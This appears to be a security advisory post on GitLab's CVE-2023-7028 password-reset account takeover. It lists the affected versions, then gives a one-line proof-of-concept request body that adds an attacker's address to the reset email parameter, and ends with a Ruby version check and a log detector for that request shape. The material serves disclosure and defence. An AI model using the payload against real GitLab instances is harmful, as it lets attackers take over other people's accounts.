Account Takeover via password reset without user interaction (CVE-2023-7028)
GitLab has released security updates to address two critical vulnerabilities, including one that could be exploited to take over accounts without requiring any user interaction.
Tracked as CVE-2023-7028, the flaw has been awarded the maximum severity of 10.0 on the CVSS scoring system and could facilitate account takeover by sending password reset emails to an unverified email address.
The DevSecOps platform said the vulnerability is the result of a bug in the email verification process, which allowed users to reset their password through a secondary email address.
It affects all self-managed instances of GitLab Community Edition (CE) and Enterprise Edition (EE) running the versions below:
- 16.1 prior to 16.1.6
- 16.2 prior to 16.2.9
- 16.3 prior to 16.3.7
- 16.4 prior to 16.4.5
- 16.5 prior to 16.5.6
- 16.6 prior to 16.6.4
- 16.7 prior to 16.7.2
GitLab said it addressed the issue in GitLab versions 16.5.6, 16.6.4, and 16.7.2, in addition to backporting the fix to versions 16.1.6, 16.2.9, 16.3.7, and 16.4.5. The company further noted the bug was introduced in 16.1.0 on May 1, 2023.
GitLab CVE-2023-7028 POC
user[email][]=valid@email.com&user[email][]=attacker@email.com
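As an added defender-side example (not GitLab's code and not part of the original post), the Ruby below checks a self-managed instance's version against the affected ranges listed above and flags password-reset requests whose user[email] parameter carries more than one address, the shape shown in the POC. The log line layout and its field names (method, path, params, remote_ip) are assumptions, and the sample entries are constructed.

```ruby
require 'json'

# Affected series from the advisory, mapped to the first fixed patch release.
AFFECTED_RANGES = {
  '16.1' => '16.1.6', '16.2' => '16.2.9', '16.3' => '16.3.7',
  '16.4' => '16.4.5', '16.5' => '16.5.6', '16.6' => '16.6.4',
  '16.7' => '16.7.2'
}.freeze

def version_key(version)
  version.split('.').map(&:to_i)
end

# True when the version is in an affected minor series and below its fix.
def vulnerable_version?(version)
  minor = version.split('.')[0, 2].join('.')
  fixed = AFFECTED_RANGES[minor]
  return false unless fixed
  (version_key(version) <=> version_key(fixed)) == -1
end

# Constructed sample of JSON request log entries (assumed layout, not real logs).
SAMPLE_LOG = <<~LOG
  {"method":"POST","path":"/users/password","params":[{"key":"user","value":{"email":["victim@example.com"]}}],"remote_ip":"203.0.113.5"}
  {"method":"POST","path":"/users/password","params":[{"key":"user","value":{"email":["victim@example.com","other@example.net"]}}],"remote_ip":"198.51.100.7"}
  {"method":"GET","path":"/users/sign_in","params":[],"remote_ip":"203.0.113.5"}
LOG

# Returns the remote IPs of password-reset POSTs whose user[email]
# parameter holds more than one address; a legitimate reset sends one.
def suspicious_reset_requests(log_text)
  log_text.each_line.filter_map do |line|
    entry = JSON.parse(line)
    next unless entry['method'] == 'POST' && entry['path'] == '/users/password'
    user = entry['params'].find { |p| p['key'] == 'user' }&.dig('value') || {}
    emails = Array(user['email'])
    entry['remote_ip'] if emails.size > 1
  rescue JSON::ParserError
    nil
  end
end
```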